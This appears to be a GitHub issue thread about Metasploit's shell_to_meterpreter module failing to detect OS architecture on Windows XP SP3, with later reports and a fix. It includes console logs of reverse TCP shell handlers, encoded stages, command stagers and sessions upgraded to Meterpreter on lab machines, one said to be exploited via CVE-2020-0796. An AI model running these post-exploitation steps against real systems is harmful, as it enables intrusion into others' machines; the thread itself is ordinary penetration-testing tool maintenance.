shell_to_meterpreter: OS architecture detection fails on Windows XP SP3

[bcoles]

post/multi/manage/shell_to_meterpreter fails on Windows XP SP3 x86 over a windows/shell/reverse_tcp session. Meterpreter supports Windows XP SP3.

Since #15864, shell_to_meterpreter attempts to use wmic os get osarchitecture which is not a valid WMIC query on XP SP3.

https://github.com/rapid7/metasploit-framework/blob/f043b121b32664f545c9d96ca43bb7fe84f6385a/modules/post/multi/manage/shell_to_meterpreter.rb#L84-L100

msf6> use exploit/multi/handler 
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set lport 1338
lport => 1338
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.200.130:1338 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.216

[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.216:1093) at 2022-07-19 03:50:31 -0400

Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name:                 EXPEE
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free

[...]

C:\Documents and Settings\user\Desktop>^Z
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                  Connection
  --  ----  ----               -----------                                                  ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows XP [Version 5.1.2600] -----  192.168.200.130:1338 -> 192.168.200.216:1093 (192.168.200.216)

[vAdrian2424]

same here

[juansonnn]

Same here. Any news?

[juansonnn]

Looking here https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb

At line 88, not sure if the syntax is correct.

[Salazar33]

Yep,, getting the same issue while upgrading shell to meterpeter

[nellaisamurai]

any solutions???

[adfoster-r7]

Cross-referencing: https://github.com/rapid7/metasploit-framework/pull/17336 - potentially better OS architecture detection would be a good follow on from the OS version detection API PR

[Young-Lord]

same.

  Id  Name  Type               Information                                 Connection
  --  ----  ----               -----------                                 ----------
  5         shell x64/windows  Shell Banner: Microsoft Windows [_ 10.0.19  192.168.1.1:7777 -> 192.168.1.1:33333
                               045.2965] (c) Microsoft Corporatio...        (192.168.1.1)

[zhanglinqiang]

Also occurred on windows10 1903.

msf6 post(multi/manage/shell_to_meterpreter) > run 

[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type               Information             Connection
  --  ----  ----               -----------             ----------
  5         shell x64/windows  Shell Banner: Microsof  10.65.106.99:4444 -> 10
                               t Windows [_ 10.0.1836  .65.106.99:47773 (172.1
                               2.30] -----             6.1.139)

msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 5
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 

Vulnerable target env is windows 10 1903(CVE-2020-0796)

msf6 post(multi/manage/shell_to_meterpreter) > sessions 5
[*] Starting interaction with 5...

Shell Banner:
Microsoft Windows [_ 10.0.18362.30]
-----

C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo

������:           DESKTOP-O0U77NO
OS ����:          Microsoft Windows 10 רҵ��
OS �汾:          10.0.18362 ��ȱ Build 18362
OS ������:        Microsoft Corporation
OS ����:          ��������վ
OS ��������:      Multiprocessor Free

[bcoles]

Also occurred on windows10 1903.

This is a different issue. #17896

[zgoldman-r7]

Looks like this issue can be closed now, it was resolved by https://github.com/rapid7/metasploit-framework/pull/18062 which no longer uses wmic and currently detects the target architecture:

Target:

msf6 payload(windows/shell/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

Shell Banner:
'\\vmware-host\Shared Folders\Desktop'
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported.  Defaulting to Windows directory.
-----

C:\WINDOWS>systeminfo
systeminfo

Host Name:                 ZACH-F90A9C7F47
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free

Module working:

msf6 payload(windows/shell/reverse_tcp) > sessions -u -1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [-1]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.1:4433
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
.... etc etc....
[*] Command stager progress: 96.51% (98542/102108 bytes)
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Sending stage (175686 bytes) to 192.168.2.135
[*] Command stager progress: 100.00% (102108/102108 bytes)
msf6 payload(windows/shell/reverse_tcp) >
[*] Meterpreter session 3 opened (192.168.2.1:4433 -> 192.168.2.135:1163) at 2023-10-23 10:32:18 -0500

Works as expected with the ENV detection: